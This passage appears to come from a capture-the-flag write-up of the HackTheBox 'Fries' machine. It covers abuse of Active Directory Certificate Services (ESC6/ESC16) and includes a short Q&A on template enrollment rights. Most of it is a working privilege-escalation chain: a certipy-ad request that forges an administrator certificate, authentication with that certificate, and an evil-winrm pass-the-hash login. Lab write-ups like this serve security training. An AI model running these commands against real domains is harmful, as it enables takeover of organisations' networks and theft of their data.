Restart-Service certsvc -Force
# Verification
certutil -config "DC01.fries.htb\fries-DC01-CA" -getreg policy\EditFlags
certutil -config "DC01.fries.htb\fries-DC01-CA" -getreg policy\DisableExtensionList
Q: After enabling ESC6 and ESC16 using gMSA_CA_prod$, why couldn’t it directly request a certificate for administrator@fries.htb?
A: Although gMSA_CA_prod$ had the ManageCA permission (allowing it to modify CA policy and enable ESC6/ESC16), it lacked enrollment rights on the User certificate template. AD CS enforces template-level access control independently of CA-level permissions. Since gMSAs are machine-scoped accounts, they are typically not granted enrollment privileges on user-centric templates like User. Thus, the CA rejected the request with CERTSRV_E_TEMPLATE_DENIED.
certipy-ad req -u 'svc_infra' -p '<PASSWORD>' -dc-ip 10.10.11.96 -ca 'fries-DC01-CA' -template 'User' -upn 'administrator@fries.htb' -sid 'S-1-5-21-858338346-3861030516-3975240472-500'

sudo ntpdate 10.10.11.96
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.96

evil-winrm -i fries.htb -u 'administrator' -H 'a773c*****************48'
